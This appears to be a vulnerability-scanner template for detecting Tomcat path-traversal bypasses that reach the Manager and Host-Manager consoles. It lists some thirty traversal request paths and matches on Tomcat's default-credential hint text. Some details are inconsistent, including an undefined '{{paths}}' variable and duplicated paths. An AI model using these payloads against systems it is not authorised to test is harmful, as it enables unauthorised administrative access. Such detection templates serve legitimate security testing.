id: tomcat_traversal2244

info:
  name: Tomcat Path Traversal Detection
  author: xandsz
  severity: medium
  description: Detects Tomcat path traversal vulnerabilities leading to unauthorized access to the Manager or Host-Manager interfaces.
  metadata:
    max-request: 29
    shodan-query: "html:\"error.log\""
  tags: tomcat, traversal, path-traversal

http:
  - method: GET
    path:
      - "{{BaseURL}}/..;/manager/html"
      - "{{BaseURL}}/%5C../manager/html"
      - "{{BaseURL}}/;;/manager/html"
      - "{{BaseURL}}/..;/host-manager/html"
      - "{{BaseURL}}/%5C../host-manager/html"
      - "{{BaseURL}}/;;/host-manager/html"
      - "{{BaseURL}}/{{paths}}/..;/"
      - "{{BaseURL}}/{{paths}}/..;/manager/html"
      - "{{BaseURL}}/{{paths}}/..;/..;/manager/html"
      - "{{BaseURL}}/{{paths}}/..;/host-manager/html"
      - "{{BaseURL}}/{{paths}}/..;/..;/host-manager/html"
      - "{{BaseURL}}/{{randstr}}/..;/manager/html"
      - "{{BaseURL}}/{{randstr}}/..;/host-manager/html"
      - "{{BaseURL}}/{{paths}}/%5C../"
      - "{{BaseURL}}/{{paths}}/%5C../manager/html"
      - "{{BaseURL}}/{{paths}}/%5C../..;/manager/html"
      - "{{BaseURL}}/{{paths}}/%5C../host-manager/html"
      - "{{BaseURL}}/{{paths}}/%5C../..;/host-manager/html"
      - "{{BaseURL}}/{{randstr}}/%5C../manager/html"
      - "{{BaseURL}}/{{randstr}}/%5C../host-manager/html"
      - "{{BaseURL}}/{{paths}}/;;/"
      - "{{BaseURL}}/{{paths}}/;;/manager/html"
      - "{{BaseURL}}/{{paths}}/;;/..;/manager/html"
      - "{{BaseURL}}/{{paths}}/;;/host-manager/html"
      - "{{BaseURL}}/{{randstr}}/;;/manager/html"
      - "{{BaseURL}}/{{randstr}}/;;/host-manager/html"
      - "{{BaseURL}}/;;/host-manager/html"
      - "{{BaseURL}}/%5C../host-manager/html"
      - "{{BaseURL}}/..;/host-manager/html"
      - "{{BaseURL}}/{{paths}}/..;/..;/manager/html"
      - "{{BaseURL}}/{{paths}}/%5C../%5C../manager/html"
      - "{{BaseURL}}/{{paths}}/;;/;;/manager/html"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'username="tomcat" password="s3cret"'
          - 'manager-gui'
      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 403
          - 401